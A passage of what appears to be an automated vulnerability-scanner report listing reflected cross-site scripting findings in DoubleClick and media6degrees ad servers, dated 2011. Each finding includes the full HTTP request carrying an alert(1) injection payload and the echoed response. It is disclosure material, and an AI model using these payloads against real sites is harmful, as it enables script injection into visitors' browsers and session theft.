Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aaee'-alert(1)-'64021cf45b7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a69"-alert(1)-"441cf269a49 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlCli
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca60b"-alert(1)-"9ecef699118 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcb10'-alert(1)-'29a07cd16fe was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f21e"-alert(1)-"c1a80b55da6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92ab7'-alert(1)-'6d6e3b013b3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3faad"-alert(1)-"dcba53557ab was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22cba'-alert(1)-'0a0ea759385 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.reuters/news/lifestyle/article

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eaaa'%3balert(1)//62bc3773dd1 was submitted in the type parameter. This input was echoed as 9eaaa';alert(1)//62bc3773dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/uk.reuters/news/lifestyle/article;type=9eaaa'%3balert(1)//62bc3773dd1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:35:57 GMT
Expires: Mon, 14 Feb 2011 01:35:57 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/a;44306;0-0;0;46373374;39648-768/768;0/0/0;;~okv=;type=9eaaa';alert(1)//62bc3773dd1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.politics/inlinead

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d2cc'-alert(1)-'80eb2a6b3f6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/wpni.politics/inlinead;ad=5d2cc'-alert(1)-'80eb2a6b3f6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:38:09 GMT
Expires: Mon, 14 Feb 2011 01:43:09 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/u;236054673;0-0;0;20580498;255-0/0;40598846/40616633/1;;~okv=;ad=5d2cc'-alert(1)-'80eb2a6b3f6;~aopt=2/0/a8/0;~sscs=%3fhttp://www.c-span.org/Series/Washington-Journal/">
...[SNIP]...

1.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdefb"-alert(1)-"6a122e04d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s